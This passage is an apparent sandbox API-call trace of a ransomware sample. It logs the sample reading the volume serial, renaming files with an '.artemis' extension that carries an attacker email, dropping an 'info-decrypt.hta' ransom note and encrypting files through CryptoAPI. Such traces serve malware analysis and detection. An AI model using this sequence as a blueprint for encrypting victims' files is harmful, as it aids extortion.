(in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0x20, pszText=0x0) returned 0x0 [0209.878] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4c0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.878] IWbemServices:GetObject (in: This=0x6747fa4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f474*=0x0, ppCallResult=0x0 | out: ppObject=0x689f474*=0x673b468, ppCallResult=0x0) returned 0x0 [0210.302] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x689f474 | out: puCount=0x689f474*=0x2) returned 0x0 [0210.302] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=4, puBuffLength=0x689f470*=0x0, pszText=0x0 | out: puBuffLength=0x689f470*=0xf, pszText=0x0) returned 0x0 [0210.302] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=4, puBuffLength=0x689f470*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f470*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.302] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f470*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350ed34*=0, plFlavor=0x350ed38*=0 | out: pVal=0x689f470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350ed34*=8, plFlavor=0x350ed38*=0) returned 0x0 [0210.302] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.302] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.302] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350ed34*=8, plFlavor=0x350ed38*=0 | out: pVal=0x689f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350ed34*=8, plFlavor=0x350ed38*=0) returned 0x0 [0210.302] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.302] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.302] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.302] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x48 [0210.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4d8) returned 1 [0210.302] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x689f554 | out: lpFileInformation=0x689f554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0210.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4d4) returned 1 [0210.303] MoveFileW (lpExistingFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0210.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0210.304] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0210.304] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0210.304] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3f0 [0210.305] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.305] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0210.305] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0210.305] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0210.305] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0210.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0210.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0210.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0210.306] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0210.306] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0210.306] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3f0 [0210.306] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.306] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0210.306] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0210.306] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0210.307] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0210.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0210.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0210.307] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.307] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.307] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0210.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f57c) returned 1 [0210.307] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta" (normalized: "c:\\boot\\en-us\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f5f8 | out: lpFileInformation=0x689f5f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f578) returned 1 [0210.307] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.307] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0210.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b0) returned 1 [0210.307] CreateFileW (lpFileName="C:\\Boot\\en-US\\info-decrypt.hta" (normalized: "c:\\boot\\en-us\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3dc [0210.308] GetFileType (hFile=0x3dc) returned 0x1 [0210.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4ac) returned 1 [0210.308] GetFileType (hFile=0x3dc) returned 0x1 [0210.308] WriteFile (in: hFile=0x3dc, lpBuffer=0x355cfa0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f574, lpOverlapped=0x0 | out: lpBuffer=0x355cfa0*, lpNumberOfBytesWritten=0x689f574*=0x1000, lpOverlapped=0x0) returned 1 [0210.309] WriteFile (in: hFile=0x3dc, lpBuffer=0x355cfa0*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f548, lpOverlapped=0x0 | out: lpBuffer=0x355cfa0*, lpNumberOfBytesWritten=0x689f548*=0x557, lpOverlapped=0x0) returned 1 [0210.309] CloseHandle (hObject=0x3dc) returned 1 [0210.309] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f098, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f544) returned 1 [0210.310] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x355dfbc | out: lpFileInformation=0x355dfbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40)) returned 1 [0210.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f540) returned 1 [0210.310] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0210.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f478) returned 1 [0210.310] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0210.310] GetFileType (hFile=0x3dc) returned 0x1 [0210.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f474) returned 1 [0210.310] GetFileType (hFile=0x3dc) returned 0x1 [0210.310] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x689f580 | out: lpFileSizeHigh=0x689f580*=0x0) returned 0x14c40 [0210.311] ReadFile (in: hFile=0x3dc, lpBuffer=0x314a8c50, nNumberOfBytesToRead=0x14c40, lpNumberOfBytesRead=0x689f52c, lpOverlapped=0x0 | out: lpBuffer=0x314a8c50*, lpNumberOfBytesRead=0x689f52c*=0x14c40, lpOverlapped=0x0) returned 1 [0210.313] CloseHandle (hObject=0x3dc) returned 1 [0210.313] CryptAcquireContextW (in: phProv=0x689f4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f4cc*=0x7a9c18) returned 1 [0210.314] CryptGenRandom (in: hProv=0x7a9c18, dwLen=0x10, pbBuffer=0x355e47c | out: pbBuffer=0x355e47c) returned 1 [0212.080] CryptImportKey (in: hProv=0x7a9c18, pbData=0x37d2380, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f49c | out: phKey=0x689f49c*=0x77b070) returned 1 [0212.081] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.081] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.081] CryptDuplicateKey (in: hKey=0x77b070, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f48c | out: phKey=0x689f48c*=0x77ae30) returned 1 [0212.081] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.081] CryptSetKeyParam (hKey=0x77ae30, dwParam=0x4, pbData=0x37d2460*=0x1, dwFlags=0x0) returned 1 [0212.081] CryptSetKeyParam (hKey=0x77ae30, dwParam=0x1, pbData=0x37d242c, dwFlags=0x0) returned 1 [0212.082] CryptEncrypt (in: hKey=0x77ae30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x31561500*, pdwDataLen=0x689f4f8*=0x14c50, dwBufLen=0x14c50 | out: pbData=0x31561500*, pdwDataLen=0x689f4f8*=0x14c50) returned 1 [0212.083] CryptEncrypt (in: hKey=0x77ae30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d2488*, pdwDataLen=0x689f500*=0x0, dwBufLen=0x10 | out: pbData=0x37d2488*, pdwDataLen=0x689f500*=0x10) returned 1 [0212.088] CryptDestroyKey (hKey=0x77b070) returned 1 [0212.088] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0212.088] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0212.089] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0212.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f464) returned 1 [0212.089] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0212.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2a0) returned 1 [0212.091] CoTaskMemAlloc (cb=0x20c) returned 0x7ade98 [0212.091] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7ade98 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0212.091] CoTaskMemFree (pv=0x7ade98) [0212.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689ef58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0212.091] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4a0 | out: ppv=0x689f4a0*=0x72015c) returned 0x0 [0212.091] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f498 | out: pAptType=0x689f498*=1) returned 0x0 [0212.091] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f49c | out: ppvObject=0x689f49c*=0x0) returned 0x80004002 [0212.091] IUnknown:Release (This=0x72015c) returned 0x1 [0212.092] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee08 | out: ppv=0x689ee08*=0x6737148) returned 0x0 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737148, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f020 | out: ppvObject=0x689f020*=0x0) returned 0x80004002 [0212.093] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737148, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f034 | out: ppvObject=0x689f034*=0x67385b0) returned 0x0 [0212.093] WbemDefPath:IUnknown:Release (This=0x6737148) returned 0x0 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec54 | out: ppvObject=0x689ec54*=0x67385b0) returned 0x0 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec10 | out: ppvObject=0x689ec10*=0x0) returned 0x80004002 [0212.093] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e51c | out: ppvObject=0x689e51c*=0x0) returned 0x80004002 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e528 | out: ppvObject=0x689e528*=0x77dc08) returned 0x0 [0212.093] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e530 | out: pCid=0x689e530*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.093] WbemDefPath:IUnknown:Release (This=0x77dc08) returned 0x3 [0212.093] CoGetContextToken (in: pToken=0x689e588 | out: pToken=0x689e588) returned 0x0 [0212.093] CoGetContextToken (in: pToken=0x689e990 | out: pToken=0x689e990) returned 0x0 [0212.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea20 | out: ppvObject=0x689ea20*=0x0) returned 0x80004002 [0212.094] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0212.094] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0212.094] CoGetContextToken (in: pToken=0x689f318 | out: pToken=0x689f318) returned 0x0 [0212.094] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0212.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x689f348*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f344 | out: ppvObject=0x689f344*=0x67385b0) returned 0x0 [0212.094] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0212.094] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0212.094] WbemDefPath:IWbemPath:SetText (This=0x67385b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4c8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c8*=0x20, pszText=0x0) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: 